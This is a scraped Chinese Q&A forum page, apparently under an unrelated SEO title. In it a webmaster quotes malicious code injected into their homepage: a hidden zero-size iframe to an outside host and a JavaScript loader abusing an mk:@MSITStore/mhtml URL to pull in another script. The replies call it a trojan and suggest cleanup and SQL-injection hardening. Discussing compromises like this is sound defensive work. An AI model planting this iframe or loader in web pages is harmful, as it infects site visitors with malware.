杭州交通信息网试验员工作总结范文:熟悉ASP JS的请进,关于JS程序问题
来源:百度文库 编辑:杭州交通信息网 时间:2024/04/26 19:07:08
我最新发现主页上被人添加了一些代码,而且空间内ASP程序文件有丢失现像,被更名现象,还有会多出几个.ASP的文件(非我上传的文件)如CCC.ASP等
主页被添加了如下代码:<html><iframe height=0 width=0 src="http://down.gament.net/q/q01"></iframe>进入上述网站后只有一个yudi.js文件,下载yudi.js文件内容为:MZ
var MZ=document.location.href;
MZ=MZ.substring(0,MZ.lastIndexOf('/'));
document.write('<OBJECT data="mk:%40MSITStore%3Amhtml%3Ac%3A\\%2Emht%21'+MZ+'%2fdongdong.js::/%23"></OBJECT>');
谁能帮我看一下,上面这段程序是干什么用的?多谢。
我知道是病毒,但如何解决呢,是不是我的FTP密码被人破解了?还有我想了解一下这段程序是要从我网站上盗取什么东西?
主页被添加了如下代码:<html><iframe height=0 width=0 src="http://down.gament.net/q/q01"></iframe>进入上述网站后只有一个yudi.js文件,下载yudi.js文件内容为:MZ
var MZ=document.location.href;
MZ=MZ.substring(0,MZ.lastIndexOf('/'));
document.write('<OBJECT data="mk:%40MSITStore%3Amhtml%3Ac%3A\\%2Emht%21'+MZ+'%2fdongdong.js::/%23"></OBJECT>');
谁能帮我看一下,上面这段程序是干什么用的?多谢。
我知道是病毒,但如何解决呢,是不是我的FTP密码被人破解了?还有我想了解一下这段程序是要从我网站上盗取什么东西?
这是病毒 或 木马程序
你的网站被人黑了
你被攻击了阿
把这些可疑代码删除,把非自己上传的文件删除,做好程序的安全,一般都是通过SQL注入,这方面资料可以百度搜索一下。关键字:"SQL注入"